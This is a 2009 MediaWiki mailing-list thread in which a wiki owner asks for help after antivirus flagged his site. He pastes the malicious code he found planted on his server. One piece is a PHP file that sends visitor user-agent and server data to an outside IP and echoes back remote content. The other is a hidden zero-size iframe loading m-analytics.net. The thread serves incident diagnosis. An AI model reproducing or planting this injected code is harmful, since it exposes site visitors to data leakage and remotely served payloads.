I notice several files that seem to have modified at the docroot level:
foter.php (never noticed this one before) with this content:
<?php
$ip = '209.62.27.83';
$port = '80';
$path = '/linkr/get/';
$fp = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$fp) {
echo '';
} else {
$post =
"u
=
".rawurlencode
($
_SERVER['HTTP_USER_AGENT'])."&h=".rawurlencode($_SERVER['SERVER_NAME']);
$out = "POST ".$path." HTTP/1.0\r\n";
$out .= "Host: ".$ip.":".$port."\r\n";
$out .= "Content-Type: text/html\r\n";
$out .= "Content-Length: ".strlen($post)."\r\n";
$out .= "Connection: Close\r\n";
$out .= "\r\n";
$out .= $post;
fwrite($fp, $out);
$resp = '';
while (!feof($fp)) {
$resp .= fgets($fp, 128);
}
fclose($fp);
$paths = split("\r\n\r\n", $resp);
echo $paths[1];
}
?>
and this "m-analytics" code was added to an old index page and a
google verification page:
<iframe src="http://m-analytics.net/qaqa/?daf02d89f0bb66c3b4a9ff31da01e10a
" width=0 height=0 style="hidden" frameborder=0 marginheight=0
marginwidth=0 scrolling=no></iframe>
Same thing happened to another wiki on this site, where the m-
analytics iframe was added. I *did not* add this, so I suspect foul
play.
Thoughts?
Tim
.........................................................Tim
Ware.........................................................
HyperArts .. 201 4th Street, Ste 404 .. Oakland CA 94607
t: (510) 339-6084 .. f: (510) 339-6086 .. e:
[email protected] .. twitter.com/hyperarts
http://www.hyperarts.com
Map
On Jun 22, 2009, at 12:05 PM, Mark (Markie) wrote:
> You seem to also have external content running on there such as m-
> analytics
> and addthis, try removing them and asking them to check again. If
> it still
> happens then you can confirm a MediaWiki problem, but I suspect it
> may be
> the analytics or similar triggering this as its the only content
> loading in
> an iframe and this is what the error seems to suggest.
>
> Regards
>
> Mark
>
> On Mon, Jun 22, 2009 at 7:59 PM, Tim Ware <[email protected]> wrote:
>
>> I got an email from someone accessing my wiki:
>>
>> http://against-the-day.pynchonwiki.com/wiki/index.php?title=Main_Page
>>
>> I'm using v 1.9.3
>>
>> Here's the message I received:
>>
>> I get a message
>> from Avast anti-virus that the page is infected with :
>> HTML:Iframe-inf.
>> I have contacted Avast who says this is not a false positive.
>> You can Google
>> virus name--it seems that this infection is fairly common.
>> Please let me know if the infection is real--I would like to use the
>> wiki.
>>
>> Any idea of what I should do to address this?
>>
>> Thanks!
>> Tim
>>
>>
>> .........................................................Tim
>> Ware.........................................................
>> HyperArts .. 201 4th Street, Ste 404 .. Oakland CA 94607
>> t: (510) 339-6084 .. f: (510) 339-6086 .. e:
>> [email protected] .. twitter.com/hyperarts
>> http://www.hyperarts.com
>> Map
>>
>>
>>
>>
>>
>> _______________________________________________
>> MediaWiki-l mailing list
>> [email protected]
>> https://lists.wikimedia.org/mailman/listinfo/mediawiki-l
>>
> _______________________________________________
> MediaWiki-l mailing list
> [email protected]
> https://lists.wikimedia.org/mailman/listinfo/mediawiki-l
_______________________________________________
MediaWiki-l mailing list
[email protected]
https://lists.wikimedia.org/mailman/listinfo/mediawiki-l
